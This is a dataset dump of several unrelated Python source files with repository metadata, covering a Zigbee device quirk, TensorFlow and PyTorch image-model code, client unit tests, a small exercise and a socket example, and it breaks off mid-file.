hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 | count_classes int64 0 1.6M | score_classes float64 0 1 | count_generators int64 0 651k | score_generators float64 0 1 | count_decorators int64 0 990k | score_decorators float64 0 1 | count_async_functions int64 0 235k | score_async_functions float64 0 1 | count_documentation int64 0 1.04M | score_documentation float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5e10d79ee00b825b54754541f414e0440dc5038c | 4,015 | py | Python | zhaquirks/xiaomi/aqara/plug.py | danielbrunt57/zha-device-handlers | e760d7261f4eff507109ad66b1185f365679a29a | [
"Apache-2.0"
] | null | null | null | zhaquirks/xiaomi/aqara/plug.py | danielbrunt57/zha-device-handlers | e760d7261f4eff507109ad66b1185f365679a29a | [
"Apache-2.0"
] | null | null | null | zhaquirks/xiaomi/aqara/plug.py | danielbrunt57/zha-device-handlers | e760d7261f4eff507109ad66b1185f365679a29a | [
"Apache-2.0"
] | 1 | 2020-11-18T13:14:35.000Z | 2020-11-18T13:14:35.000Z | """Xiaomi lumi.plug plug."""
import logging
from zigpy.profiles import zha
from zigpy.zcl.clusters.general import (
AnalogInput,
Basic,
BinaryOutput,
DeviceTemperature,
Groups,
Identify,
OnOff,
Ota,
PowerConfiguration,
Scenes,
Time,
)
from zhaquirks.xiaomi import (
LUMI,
AnalogInputCluster,
BasicCluster,
ElectricalMeasurementCluster,
XiaomiCustomDevice,
)
from zhaquirks import Bus
from zhaquirks.const import (
DEVICE_TYPE,
ENDPOINTS,
INPUT_CLUSTERS,
MODELS_INFO,
OUTPUT_CLUSTERS,
PROFILE_ID,
SKIP_CONFIGURATION,
)
_LOGGER = logging.getLogger(__name__)
class Plug(XiaomiCustomDevice):
"""lumi.plug plug."""
def __init__(self, *args, **kwargs):
"""Init."""
self.voltage_bus = Bus()
self.consumption_bus = Bus()
self.power_bus = Bus()
super().__init__(*args, **kwargs)
signature = {
MODELS_INFO: [(LUMI, "lumi.plug")],
ENDPOINTS: {
# <SimpleDescriptor endpoint=1 profile=260 device_type=81
# device_version=1
# input_clusters=[0, 4, 3, 6, 16, 5, 10, 1, 2]
# output_clusters=[25, 10]>
1: {
PROFILE_ID: zha.PROFILE_ID,
DEVICE_TYPE: zha.DeviceType.SMART_PLUG,
INPUT_CLUSTERS: [
Basic.cluster_id,
PowerConfiguration.cluster_id,
DeviceTemperature.cluster_id,
Groups.cluster_id,
Identify.cluster_id,
OnOff.cluster_id,
Scenes.cluster_id,
BinaryOutput.cluster_id,
Time.cluster_id,
],
OUTPUT_CLUSTERS: [Ota.cluster_id, Time.cluster_id],
},
# <SimpleDescriptor endpoint=2 profile=260 device_type=9
# device_version=1
# input_clusters=[12]
# output_clusters=[12, 4]>
2: {
PROFILE_ID: zha.PROFILE_ID,
DEVICE_TYPE: zha.DeviceType.MAIN_POWER_OUTLET,
INPUT_CLUSTERS: [AnalogInput.cluster_id],
OUTPUT_CLUSTERS: [AnalogInput.cluster_id, Groups.cluster_id],
},
# <SimpleDescriptor endpoint=3 profile=260 device_type=83
# device_version=1
# input_clusters=[12]
# output_clusters=[12]>
3: {
PROFILE_ID: zha.PROFILE_ID,
DEVICE_TYPE: zha.DeviceType.METER_INTERFACE,
INPUT_CLUSTERS: [AnalogInput.cluster_id],
OUTPUT_CLUSTERS: [AnalogInput.cluster_id],
},
},
}
replacement = {
SKIP_CONFIGURATION: True,
ENDPOINTS: {
1: {
PROFILE_ID: zha.PROFILE_ID,
DEVICE_TYPE: zha.DeviceType.SMART_PLUG,
INPUT_CLUSTERS: [
BasicCluster,
PowerConfiguration.cluster_id,
DeviceTemperature.cluster_id,
Groups.cluster_id,
Identify.cluster_id,
OnOff.cluster_id,
Scenes.cluster_id,
BinaryOutput.cluster_id,
Time.cluster_id,
ElectricalMeasurementCluster,
],
OUTPUT_CLUSTERS: [Ota.cluster_id, Time.cluster_id],
},
2: {
PROFILE_ID: zha.PROFILE_ID,
DEVICE_TYPE: zha.DeviceType.MAIN_POWER_OUTLET,
INPUT_CLUSTERS: [AnalogInputCluster],
OUTPUT_CLUSTERS: [AnalogInput.cluster_id, Groups.cluster_id],
},
3: {
PROFILE_ID: zha.PROFILE_ID,
DEVICE_TYPE: zha.DeviceType.METER_INTERFACE,
INPUT_CLUSTERS: [AnalogInput.cluster_id],
OUTPUT_CLUSTERS: [AnalogInput.cluster_id],
},
},
}
| 31.124031 | 77 | 0.534994 | 3,361 | 0.837111 | 0 | 0 | 0 | 0 | 0 | 0 | 459 | 0.114321 |
5e12c134d94ad9be780e1e0c73e68d0648224d24 | 5,193 | py | Python | learners/fully_observed_learner.py | Aaron-Jin-Xu/probabilistic-semantic-image-inpainting | 8ce630eaf7e8f9ef5fc5ad19d5474d050d71807d | [
"MIT"
] | 1 | 2020-04-19T22:48:25.000Z | 2020-04-19T22:48:25.000Z | learners/fully_observed_learner.py | Aaron-Jin-Xu/probabilistic-semantic-image-inpainting | 8ce630eaf7e8f9ef5fc5ad19d5474d050d71807d | [
"MIT"
] | null | null | null | learners/fully_observed_learner.py | Aaron-Jin-Xu/probabilistic-semantic-image-inpainting | 8ce630eaf7e8f9ef5fc5ad19d5474d050d71807d | [
"MIT"
] | null | null | null | import os
import sys
import json
import time
import numpy as np
import tensorflow as tf
from blocks.helpers import Monitor
from blocks.helpers import visualize_samples, get_nonlinearity, int_shape, get_trainable_variables, broadcast_masks_np
from blocks.optimizers import adam_updates
import data.load_data as load_data
from masks import get_generator
from .learner import Learner
class FullyObservedLearner(Learner):
def __init__(self, nr_gpu, save_dir, img_size, exp_name="default"):
super().__init__(nr_gpu, save_dir, img_size, exp_name)
def train_epoch(self, mgen, which_set='train'):
if which_set == 'train':
data_set = self.train_set
elif which_set == 'eval':
data_set = self.eval_set
elif which_set == 'test':
data_set = self.test_set
for data in data_set:
if self.num_channels == 3:
data = np.cast[np.float32]((data - 127.5) / 127.5)
ds = np.split(data, self.nr_gpu)
feed_dict = {}
feed_dict.update({model.is_training: True for model in self.models})
feed_dict.update({model.dropout_p: 0.5 for model in self.models})
feed_dict.update({model.x: ds[i] for i, model in enumerate(self.models)})
feed_dict.update({model.x_bar: ds[i] for i, model in enumerate(self.models)})
masks_np = [mgen.gen(self.batch_size//self.nr_gpu) for i in range(self.nr_gpu)]
feed_dict.update({model.masks: masks_np[i] for i, model in enumerate(self.models)})
self.sess.run(self.train_step, feed_dict=feed_dict)
def eval_epoch(self, mgen, which_set='eval'):
if which_set == 'train':
data_set = self.train_set
elif which_set == 'eval':
data_set = self.eval_set
elif which_set == 'test':
data_set = self.test_set
for data in data_set:
if self.num_channels == 3:
data = np.cast[np.float32]((data - 127.5) / 127.5)
ds = np.split(data, self.nr_gpu)
feed_dict = {}
feed_dict.update({model.is_training: False for model in self.models})
feed_dict.update({model.dropout_p: 0.0 for model in self.models})
feed_dict.update({model.x: ds[i] for i, model in enumerate(self.models)})
feed_dict.update({model.x_bar: ds[i] for i, model in enumerate(self.models)})
masks_np = [mgen.gen(self.batch_size//self.nr_gpu) for i in range(self.nr_gpu)]
feed_dict.update({model.masks: masks_np[i] for i, model in enumerate(self.models)})
self.monitor.evaluate(self.sess, feed_dict)
def sample(self, data, mgen, same_inputs=False, use_mask_at=None):
if self.num_channels == 3:
data = np.cast[np.float32]((data - 127.5) / 127.5)
if same_inputs:
for i in range(data.shape[0]):
data[i] = data[3]
ori_data = data.copy()
ds = np.split(data.copy(), self.nr_gpu)
feed_dict = {}
feed_dict.update({model.is_training: False for model in self.models})
feed_dict.update({model.dropout_p: 0.0 for model in self.models})
feed_dict.update({model.x: ds[i] for i, model in enumerate(self.models)})
feed_dict.update({model.x_bar: ds[i] for i, model in enumerate(self.models)})
if use_mask_at is not None:
masks_np = np.load(use_mask_at)['masks']
masks_np = np.split(masks_np, self.nr_gpu)
else:
masks_np = [mgen.gen(self.batch_size//self.nr_gpu) for i in range(self.nr_gpu)]
np.savez(mgen.name+"_"+self.data_set, masks=np.concatenate(masks_np))
if same_inputs:
for g in range(self.nr_gpu):
for i in range(self.batch_size//self.nr_gpu):
masks_np[g][i] = masks_np[0][0]
feed_dict.update({model.masks: masks_np[i] for i, model in enumerate(self.models)})
#
for i in range(self.nr_gpu):
ds[i] *= broadcast_masks_np(masks_np[i], num_channels=self.num_channels)
masked_data = np.concatenate(ds, axis=0)
x_gen = [ds[i].copy() for i in range(self.nr_gpu)]
for yi in range(self.img_size):
for xi in range(self.img_size):
if np.min(np.array([masks_np[i][:, yi, xi] for i in range(self.nr_gpu)])) > 0:
continue
feed_dict.update({model.x_bar:x_gen[i] for i, model in enumerate(self.models)})
x_hats = self.sess.run([model.x_hat for model in self.models], feed_dict=feed_dict)
for i in range(self.nr_gpu):
bmask = broadcast_masks_np(masks_np[i][:, yi, xi] , num_channels=self.num_channels)
x_gen[i][:, yi, xi, :] = x_hats[i][:, yi, xi, :] * (1.-bmask) + x_gen[i][:, yi, xi, :] * bmask
gen_data = np.concatenate(x_gen, axis=0)
if self.num_channels == 1:
masks_np = np.concatenate(masks_np, axis=0)
masks_np = broadcast_masks_np(masks_np, num_channels=self.num_channels)
masked_data += (1-masks_np) * 0.5
return ori_data, masked_data, gen_data
| 48.53271 | 118 | 0.613133 | 4,810 | 0.926247 | 0 | 0 | 0 | 0 | 0 | 0 | 71 | 0.013672 |
5e13ce9974225da3573940cfb2a5a693b633e821 | 993 | py | Python | tests/unit/test_source/test_sourcebase.py | rbogdanoff/reactiveaws | 3a4107dd4ade26792f79fecbb4d1e783e4e2580f | [
"Apache-2.0"
] | null | null | null | tests/unit/test_source/test_sourcebase.py | rbogdanoff/reactiveaws | 3a4107dd4ade26792f79fecbb4d1e783e4e2580f | [
"Apache-2.0"
] | null | null | null | tests/unit/test_source/test_sourcebase.py | rbogdanoff/reactiveaws | 3a4107dd4ade26792f79fecbb4d1e783e4e2580f | [
"Apache-2.0"
] | null | null | null | from nose.tools import *
from unittest.mock import patch, Mock
from rxaws.source.sourcebase import SourceBase
from botocore.client import BaseClient
class BaseClient(Mock):
""" mock boto BaseClient, won't really do anything"""
class TestSourceBase:
# inject the mock BaseClient
@patch('boto3.client', return_value=(BaseClient()))
# mock the get_source_iterable abstractmethod
# @patch.multiple(SourceBase, __abstractmethods__=set(), execute=Mock(return_value=[1,2,3]))
def setup(self, mock_return_value):
# create instance of class under test
self.cut_sourcebase = SourceBase()
def teardown(self):
pass
def test_sourcebase_create(self):
# when a new SourceBase instance is created
# is should contain an aws client
assert self.cut_sourcebase.conn is not None
assert isinstance(self.cut_sourcebase.conn, BaseClient) is True, \
'expected BaseClient got: %s' % type(self.cut_sourcebase.conn)
| 35.464286 | 95 | 0.712991 | 839 | 0.844914 | 0 | 0 | 0 | 0 | 0 | 0 | 374 | 0.376636 |
5e15026007a09207c6424778c0b96d54f0620c12 | 1,725 | py | Python | tests/events/events_client_test.py | riaz-bordie-cko/checkout-sdk-python | d9bc073306c1a98544c326be693ed722576ea895 | [
"MIT"
] | null | null | null | tests/events/events_client_test.py | riaz-bordie-cko/checkout-sdk-python | d9bc073306c1a98544c326be693ed722576ea895 | [
"MIT"
] | null | null | null | tests/events/events_client_test.py | riaz-bordie-cko/checkout-sdk-python | d9bc073306c1a98544c326be693ed722576ea895 | [
"MIT"
] | null | null | null | import pytest
from checkout_sdk.events.events import RetrieveEventsRequest
from checkout_sdk.events.events_client import EventsClient
@pytest.fixture(scope='class')
def client(mock_sdk_configuration, mock_api_client):
return EventsClient(api_client=mock_api_client, configuration=mock_sdk_configuration)
class TestEventsClient:
def test_retrieve_all_event_types(self, mocker, client: EventsClient):
mocker.patch('checkout_sdk.api_client.ApiClient.get', return_value='response')
assert client.retrieve_all_event_types() == 'response'
def test_retrieve_events(self, mocker, client: EventsClient):
mocker.patch('checkout_sdk.api_client.ApiClient.get', return_value='response')
assert client.retrieve_events(RetrieveEventsRequest()) == 'response'
def test_retrieve_event(self, mocker, client: EventsClient):
mocker.patch('checkout_sdk.api_client.ApiClient.get', return_value='response')
assert client.retrieve_event('event_id') == 'response'
def test_retrieve_event_notification(self, mocker, client: EventsClient):
mocker.patch('checkout_sdk.api_client.ApiClient.get', return_value='response')
assert client.retrieve_event_notification('event_id', 'notification_id') == 'response'
def test_retry_webhook(self, mocker, client: EventsClient):
mocker.patch('checkout_sdk.api_client.ApiClient.post', return_value='response')
assert client.retry_webhook('event_id', 'webhook_id') == 'response'
def test_retry_all_webhooks(self, mocker, client: EventsClient):
mocker.patch('checkout_sdk.api_client.ApiClient.post', return_value='response')
assert client.retry_all_webhooks('event_id') == 'response'
| 46.621622 | 94 | 0.762899 | 1,411 | 0.817971 | 0 | 0 | 173 | 0.10029 | 0 | 0 | 432 | 0.250435 |
5e15898d023ea4288e326bb8421789a0314d64e1 | 9,261 | py | Python | vectornet/trainer.py | chickenfingerwu/pytorch-CycleGAN-and-pix2pix | 367033f7d265fc7307ed0c917a4f8d19b298e6b7 | [
"BSD-3-Clause"
] | null | null | null | vectornet/trainer.py | chickenfingerwu/pytorch-CycleGAN-and-pix2pix | 367033f7d265fc7307ed0c917a4f8d19b298e6b7 | [
"BSD-3-Clause"
] | null | null | null | vectornet/trainer.py | chickenfingerwu/pytorch-CycleGAN-and-pix2pix | 367033f7d265fc7307ed0c917a4f8d19b298e6b7 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import print_function
import os
import numpy as np
from tqdm import trange
from models import *
from utils import save_image
class Trainer(object):
def __init__(self, config, batch_manager):
tf.compat.v1.set_random_seed(config.random_seed)
self.config = config
self.batch_manager = batch_manager
self.x, self.y = batch_manager.batch()
self.xt =tf.compat.v1.placeholder(tf.float32, shape=int_shape(self.x))
self.yt =tf.compat.v1.placeholder(tf.float32, shape=int_shape(self.y))
self.dataset = config.dataset
self.beta1 = config.beta1
self.beta2 = config.beta2
self.optimizer = config.optimizer
self.batch_size = config.batch_size
self.lr = tf.Variable(config.lr, name='lr')
self.lr_update = tf.assign(self.lr, tf.maximum(self.lr*0.1, config.lr_lower_boundary), name='lr_update')
self.height = config.height
self.width = config.width
self.b_num = config.batch_size
self.conv_hidden_num = config.conv_hidden_num
self.repeat_num = config.repeat_num
self.use_l2 = config.use_l2
self.use_norm = config.use_norm
self.model_dir = config.model_dir
self.use_gpu = config.use_gpu
self.data_format = config.data_format
if self.data_format == 'NCHW':
self.x = nhwc_to_nchw(self.x)
self.y = nhwc_to_nchw(self.y)
self.xt = nhwc_to_nchw(self.xt)
self.yt = nhwc_to_nchw(self.yt)
self.start_step = config.start_step
self.log_step = config.log_step
self.test_step = config.test_step
self.max_step = config.max_step
self.save_sec = config.save_sec
self.lr_update_step = config.lr_update_step
self.step = tf.Variable(self.start_step, name='step', trainable=False)
self.is_train = config.is_train
self.build_model()
self.saver = tf.compat.v1.train.Saver()
self.summary_writer = tf.summary.FileWriter(self.model_dir)
sv = tf.train.Supervisor(logdir=self.model_dir,
is_chief=True,
saver=self.saver,
summary_op=None,
summary_writer=self.summary_writer,
save_model_secs=self.save_sec,
global_step=self.step,
ready_for_local_init_op=None)
gpu_options = tf.compat.v1.GPUOptions(allow_growth=True)
sess_config = tf.compat.v1.ConfigProto(allow_soft_placement=True,
gpu_options=gpu_options)
self.sess = sv.prepare_or_wait_for_session(config=sess_config)
if self.is_train:
self.batch_manager.start_thread(self.sess)
def build_model(self):
self.y_, self.var = VDSR(
self.x, self.conv_hidden_num, self.repeat_num, self.data_format, self.use_norm)
self.y_img = denorm_img(self.y_, self.data_format) # for debug
self.yt_, _ = VDSR(
self.xt, self.conv_hidden_num, self.repeat_num, self.data_format, self.use_norm,
train=False, reuse=True)
self.yt_ = tf.clip_by_value(self.yt_, 0, 1)
self.yt_img = denorm_img(self.yt_, self.data_format)
show_all_variables()
if self.optimizer == 'adam':
optimizer = tf.train.AdamOptimizer
else:
raise Exception("[!] Caution! Paper didn't use {} opimizer other than Adam".format(self.config.optimizer))
optimizer = optimizer(self.lr, beta1=self.beta1, beta2=self.beta2)
# losses
# l1 and l2
self.loss_l1 = tf.reduce_mean(tf.abs(self.y_ - self.y))
self.loss_l2 = tf.reduce_mean(tf.squared_difference(self.y_, self.y))
# total
if self.use_l2:
self.loss = self.loss_l2
else:
self.loss = self.loss_l1
# test loss
self.tl1 = 1 - tf.reduce_mean(tf.abs(self.yt_ - self.yt))
self.tl2 = 1 - tf.reduce_mean(tf.squared_difference(self.yt_, self.yt))
self.test_acc_l1 =tf.compat.v1.placeholder(tf.float32)
self.test_acc_l2 =tf.compat.v1.placeholder(tf.float32)
self.test_acc_iou =tf.compat.v1.placeholder(tf.float32)
self.optim = optimizer.minimize(self.loss, global_step=self.step, var_list=self.var)
summary = [
tf.summary.image("y", self.y_img),
tf.summary.scalar("loss/loss", self.loss),
tf.summary.scalar("loss/loss_l1", self.loss_l1),
tf.summary.scalar("loss/loss_l2", self.loss_l2),
tf.summary.scalar("misc/lr", self.lr),
tf.summary.scalar('misc/q', self.batch_manager.q.size())
]
self.summary_op = tf.summary.merge(summary)
summary = [
tf.summary.image("x_sample", denorm_img(self.x, self.data_format)),
tf.summary.image("y_sample", denorm_img(self.y, self.data_format)),
]
self.summary_once = tf.summary.merge(summary) # call just once
summary = [
tf.summary.scalar("loss/test_acc_l1", self.test_acc_l1),
tf.summary.scalar("loss/test_acc_l2", self.test_acc_l2),
tf.summary.scalar("loss/test_acc_iou", self.test_acc_iou),
]
self.summary_test = tf.summary.merge(summary)
def train(self):
x_list, xs, ys, sample_list = self.batch_manager.random_list(self.b_num)
save_image(xs, '{}/x_gt.png'.format(self.model_dir))
save_image(ys, '{}/y_gt.png'.format(self.model_dir))
with open('{}/gt.txt'.format(self.model_dir), 'w') as f:
for sample in sample_list:
f.write(sample + '\n')
# call once
summary_once = self.sess.run(self.summary_once)
self.summary_writer.add_summary(summary_once, 0)
self.summary_writer.flush()
for step in trange(self.start_step, self.max_step):
fetch_dict = {
"optim": self.optim,
"loss": self.loss,
}
if step % self.log_step == 0 or step == self.max_step-1:
fetch_dict.update({
"summary": self.summary_op,
})
# if step % self.test_step == self.test_step-1 or step == self.max_step-1:
if True:
l1, l2, iou, nb = 0, 0, 0, 0
for x, y in self.batch_manager.test_batch():
if self.data_format == 'NCHW':
x = to_nchw_numpy(x)
y = to_nchw_numpy(y)
tl1, tl2, y_ = self.sess.run([self.tl1, self.tl2, self.yt_], {self.xt: x, self.yt: y})
l1 += tl1
l2 += tl2
nb += 1
# iou
y_I = np.logical_and(y>0, y_>0)
y_I_sum = np.sum(y_I, axis=(1, 2, 3))
y_U = np.logical_or(y>0, y_>0)
y_U_sum = np.sum(y_U, axis=(1, 2, 3))
# print(y_I_sum, y_U_sum)
nonzero_id = np.where(y_U_sum != 0)[0]
if nonzero_id.shape[0] == 0:
acc = 1.0
else:
acc = np.average(y_I_sum[nonzero_id] / y_U_sum[nonzero_id])
iou += acc
if nb > 500:
break
l1 /= float(nb)
l2 /= float(nb)
iou /= float(nb)
summary_test = self.sess.run(self.summary_test,
{self.test_acc_l1: l1, self.test_acc_l2: l2, self.test_acc_iou: iou})
self.summary_writer.add_summary(summary_test, step)
self.summary_writer.flush()
result = self.sess.run(fetch_dict)
if step % self.log_step == 0 or step == self.max_step-1:
self.summary_writer.add_summary(result['summary'], step)
self.summary_writer.flush()
loss = result['loss']
assert not np.isnan(loss), 'Model diverged with loss = NaN'
print("\n[{}/{}] Loss: {:.6f}".format(step, self.max_step, loss))
if step % (self.log_step * 10) == 0 or step == self.max_step-1:
self.generate(x_list, self.model_dir, idx=step)
if step % self.lr_update_step == self.lr_update_step - 1:
self.sess.run(self.lr_update)
# save last checkpoint..
save_path = os.path.join(self.model_dir, 'model.ckpt')
self.saver.save(self.sess, save_path, global_step=self.step)
self.batch_manager.stop_thread()
def generate(self, x_samples, root_path=None, idx=None):
if self.data_format == 'NCHW':
x_samples = to_nchw_numpy(x_samples)
generated = self.sess.run(self.yt_img, {self.xt: x_samples})
y_path = os.path.join(root_path, 'y_{}.png'.format(idx))
save_image(generated, y_path, nrow=self.b_num)
print("[*] Samples saved: {}".format(y_path)) | 39.241525 | 118 | 0.563546 | 9,117 | 0.984451 | 0 | 0 | 0 | 0 | 0 | 0 | 623 | 0.067271 |
5e15921eff92f5c9d6be850512491ee049db1643 | 188 | py | Python | Exercicios/010.py | sleepinhoo/Python | d8ac7f3297f3a99b27b07d7341a16503a64124b0 | [
"MIT"
] | null | null | null | Exercicios/010.py | sleepinhoo/Python | d8ac7f3297f3a99b27b07d7341a16503a64124b0 | [
"MIT"
] | null | null | null | Exercicios/010.py | sleepinhoo/Python | d8ac7f3297f3a99b27b07d7341a16503a64124b0 | [
"MIT"
] | null | null | null | grana = float(input("Informe a quantidade de dinherio: R$"))
dolar = 5.4
print(f" Dá pra comprar USS${grana / dolar} com o valor atual na sua carteira")
print(f"Cotação usada: {dolar}")
| 26.857143 | 79 | 0.702128 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 138 | 0.722513 |
5e16653f23f402e0f2a6b24312399977f5a75d4f | 210 | py | Python | src/11/zero_copy_sending_and_receiving_of_large_arrays/server.py | tuanavu/python-gitbook | 948a05e065b0f40afbfd22f697dff16238163cde | [
"MIT"
] | 14 | 2017-05-20T04:06:46.000Z | 2022-01-23T06:48:45.000Z | src/11/zero_copy_sending_and_receiving_of_large_arrays/server.py | tuanavu/python-gitbook | 948a05e065b0f40afbfd22f697dff16238163cde | [
"MIT"
] | 1 | 2021-06-10T20:17:55.000Z | 2021-06-10T20:17:55.000Z | src/11/zero_copy_sending_and_receiving_of_large_arrays/server.py | tuanavu/python-gitbook | 948a05e065b0f40afbfd22f697dff16238163cde | [
"MIT"
] | 15 | 2017-03-29T17:57:33.000Z | 2021-08-24T02:20:08.000Z | from zerocopy import send_from
from socket import *
s = socket(AF_INET, SOCK_STREAM)
s.bind(('', 25000))
s.listen(1)
c,a = s.accept()
import numpy
a = numpy.arange(0.0, 50000000.0)
send_from(a, c)
c.close()
| 15 | 33 | 0.695238 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 | 0.009524 |
5e16ad16c7c3a0ea076e3bd752e1db8ba4d1da1c | 22,168 | py | Python | YNet/stage2/Model.py | cancertech/-cancer_diagnosis | caa371e64e52be71a85f9a73baa6b518b28cc166 | [
"MIT"
] | 126 | 2018-06-06T01:33:28.000Z | 2022-03-18T01:48:56.000Z | YNet/stage2/Model.py | cancertech/-cancer_diagnosis | caa371e64e52be71a85f9a73baa6b518b28cc166 | [
"MIT"
] | 13 | 2018-07-26T13:49:56.000Z | 2021-04-20T07:44:47.000Z | YNet/stage2/Model.py | cancertech/-cancer_diagnosis | caa371e64e52be71a85f9a73baa6b518b28cc166 | [
"MIT"
] | 32 | 2018-06-06T01:20:03.000Z | 2022-03-18T02:52:53.000Z | #
# author: Sachin Mehta
# Project Description: This repository contains source code for semantically segmenting WSIs; however, it could be easily
# adapted for other domains such as natural image segmentation
# File Description: This file contains the CNN models
# ==============================================================================
import torch
import torch.nn as nn
class CBR(nn.Module):
def __init__(self, nIn, nOut, kSize, stride=1):
super().__init__()
padding = int((kSize - 1) / 2)
self.conv = nn.Conv2d(nIn, nOut, kSize, stride=stride, padding=padding, bias=False)
self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-03)
self.act = nn.ReLU(True)
def forward(self, input):
output = self.conv(input)
output = self.bn(output)
output = self.act(output)
return output
class CB(nn.Module):
def __init__(self, nIn, nOut, kSize, stride=1):
super().__init__()
padding = int((kSize - 1) / 2)
self.conv = nn.Conv2d(nIn, nOut, kSize, stride=stride, padding=padding, bias=False)
self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-03)
def forward(self, input):
output = self.conv(input)
output = self.bn(output)
return output
class C(nn.Module):
def __init__(self, nIn, nOut, kSize, stride=1):
super().__init__()
padding = int((kSize - 1) / 2)
self.conv = nn.Conv2d(nIn, nOut, kSize, stride=stride, padding=padding, bias=False)
def forward(self, input):
output = self.conv(input)
return output
class DownSampler(nn.Module):
def __init__(self, nIn, nOut):
super().__init__()
self.conv = nn.Conv2d(nIn, nOut - nIn, 3, stride=2, padding=1, bias=False)
self.pool = nn.AvgPool2d(3, stride=2, padding=1)
self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-3)
self.act = nn.ReLU(True) # nn.PReLU(nOut)
def forward(self, input):
output = torch.cat([self.conv(input), self.pool(input)], 1)
output = self.bn(output)
output = self.act(output)
return output
class BasicResidualBlock(nn.Module):
def __init__(self, nIn, nOut, prob=0.03):
super().__init__()
self.c1 = CBR(nIn, nOut, 3, 1)
self.c2 = CB(nOut, nOut, 3, 1)
self.act = nn.ReLU(True) # nn.PReLU(nOut)
# self.drop = nn.Dropout2d(p=prob)
def forward(self, input):
output = self.c1(input)
output = self.c2(output)
output = input + output
# output = self.drop(output)
output = self.act(output)
return output
class DownSamplerA(nn.Module):
def __init__(self, nIn, nOut):
super().__init__()
self.conv = CBR(nIn, nOut, 3, 2)
def forward(self, input):
output = self.conv(input)
return output
class BR(nn.Module):
def __init__(self, nOut):
super().__init__()
self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-03)
self.act = nn.ReLU(True) # nn.PReLU(nOut)
def forward(self, input):
output = self.bn(input)
output = self.act(output)
return output
class CDilated(nn.Module):
def __init__(self, nIn, nOut, kSize, stride=1, d=1):
super().__init__()
padding = int((kSize - 1) / 2) * d
self.conv = nn.Conv2d(nIn, nOut, (kSize, kSize), stride=stride, padding=(padding, padding), bias=False,
dilation=d)
def forward(self, input):
output = self.conv(input)
return output
class CDilated1(nn.Module):
def __init__(self, nIn, nOut, kSize, stride=1, d=1):
super().__init__()
padding = int((kSize - 1) / 2) * d
self.conv = nn.Conv2d(nIn, nOut, (kSize, kSize), stride=stride, padding=(padding, padding), bias=False,
dilation=d)
self.br = BR(nOut)
def forward(self, input):
output = self.conv(input)
return self.br(output)
class DilatedParllelResidualBlockB(nn.Module):
def __init__(self, nIn, nOut, prob=0.03):
super().__init__()
n = int(nOut / 5)
n1 = nOut - 4 * n
self.c1 = C(nIn, n, 1, 1)
self.d1 = CDilated(n, n1, 3, 1, 1)
self.d2 = CDilated(n, n, 3, 1, 2)
self.d4 = CDilated(n, n, 3, 1, 4)
self.d8 = CDilated(n, n, 3, 1, 8)
self.d16 = CDilated(n, n, 3, 1, 16)
self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-3)
self.act = nn.ReLU(True) # nn.PReLU(nOut)
# self.drop = nn.Dropout2d(p=prob)
def forward(self, input):
output1 = self.c1(input)
d1 = self.d1(output1)
d2 = self.d2(output1)
d4 = self.d4(output1)
d8 = self.d8(output1)
d16 = self.d16(output1)
add1 = d2
add2 = add1 + d4
add3 = add2 + d8
add4 = add3 + d16
combine = torch.cat([d1, add1, add2, add3, add4], 1)
combine_in_out = input + combine
output = self.bn(combine_in_out)
# output = self.drop(output)
output = self.act(output)
return output
class DilatedParllelResidualBlockB1(nn.Module):
def __init__(self, nIn, nOut, prob=0.03):
super().__init__()
n = int(nOut / 4)
n1 = nOut - 3 * n
self.c1 = C(nIn, n, 3, 1)
self.d1 = CDilated(n, n1, 3, 1, 1)
self.d2 = CDilated(n, n, 3, 1, 2)
self.d4 = CDilated(n, n, 3, 1, 4)
self.d8 = CDilated(n, n, 3, 1, 8)
self.d16 = CDilated(n, n, 3, 1, 16)
self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-3)
self.act = nn.ReLU(True) # nn.PReLU(nOut)
# self.drop = nn.Dropout2d(p=prob)
def forward(self, input):
output1 = self.c1(input)
d1 = self.d1(output1)
d2 = self.d2(output1)
d4 = self.d4(output1)
d8 = self.d8(output1)
# d16 = self.d16(output1)
add1 = d2
add2 = add1 + d4
add3 = add2 + d8
# add4 = add3 + d16
combine = torch.cat([d1, add1, add2, add3], 1)
combine_in_out = input + combine
output = self.bn(combine_in_out)
# output = self.drop(output)
output = self.act(output)
return output
class PSPDec(nn.Module):
def __init__(self, nIn, nOut, downSize, upSize=48):
super().__init__()
self.features = nn.Sequential(
nn.AdaptiveAvgPool2d(downSize),
nn.Conv2d(nIn, nOut, 1, bias=False),
nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-3),
nn.ReLU(True), # nn.PReLU(nOut),
nn.Upsample(size=upSize, mode='bilinear')
)
def forward(self, x):
return self.features(x)
class ResNetC1(nn.Module):
'''
Segmentation model with ESP as the encoding block.
This is the same as in stage 1
